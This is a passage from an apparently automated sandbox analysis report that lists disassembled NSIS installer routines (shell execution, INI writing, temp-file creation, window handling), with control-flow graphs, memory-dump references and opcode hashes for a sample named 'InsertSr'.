                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2740478559-0
                                                                            • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                            • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f69 GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 745 401f6e-401f7b 734->745 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 751 402387-40238d GlobalFree 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 750 4030e3-4030f2 745->750 745->751 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGloballstrcpyn
                                                                            • String ID: Exch: stack < %d elements$JoyAustria$Pop: stack empty
                                                                            • API String ID: 1459762280-1086466899
                                                                            • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                            • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 766 402713-40273b call 406009 * 2 771 402746-402749 766->771 772 40273d-402743 call 40145c 766->772 774 402755-402758 771->774 775 40274b-402752 call 40145c 771->775 772->771 776 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 774->776 777 40275a-402761 call 40145c 774->777 775->774 777->776
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                            • String ID: <RM>$JoyAustria$WriteINIStr: wrote [%s] %s=%s in %s
                                                                            • API String ID: 247603264-782302037
                                                                            • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                            • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                            • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                            • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 873 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 884 402223-4030f2 call 4062a3 873->884 885 40220d-40221b call 4062a3 873->885 885->884
                                                                            APIs
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                            • API String ID: 3156913733-2180253247
                                                                            • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                            • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                            • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                            • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 893 405e7f-405e8b 894 405e8c-405ec0 GetTickCount GetTempFileNameW 893->894 895 405ec2-405ec4 894->895 896 405ecf-405ed1 894->896 895->894 898 405ec6 895->898 897 405ec9-405ecc 896->897 898->897
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405E9D
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: nsa
                                                                            • API String ID: 1716503409-2209301699
                                                                            • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                            • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                            • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                            • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 899 402175-40218b call 401446 * 2 904 402198-40219d 899->904 905 40218d-402197 call 4062a3 899->905 907 4021aa-4021b0 EnableWindow 904->907 908 40219f-4021a5 ShowWindow 904->908 905->904 909 4030e3-4030f2 907->909 908->909
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                            • String ID: HideWindow
                                                                            • API String ID: 1249568736-780306582
                                                                            • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                            • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                            • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                            • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                            • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                            • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                            • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                            • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                            • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                            • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                            • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                            • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                            • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                            • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                            • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                            • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                            • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                            • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                            • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                            • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                            • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                            • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                            APIs
                                                                            • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                            • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 3394109436-0
                                                                            • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                            • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                            • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                            • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                            • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                            • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                            • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                            • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                            • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                            • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
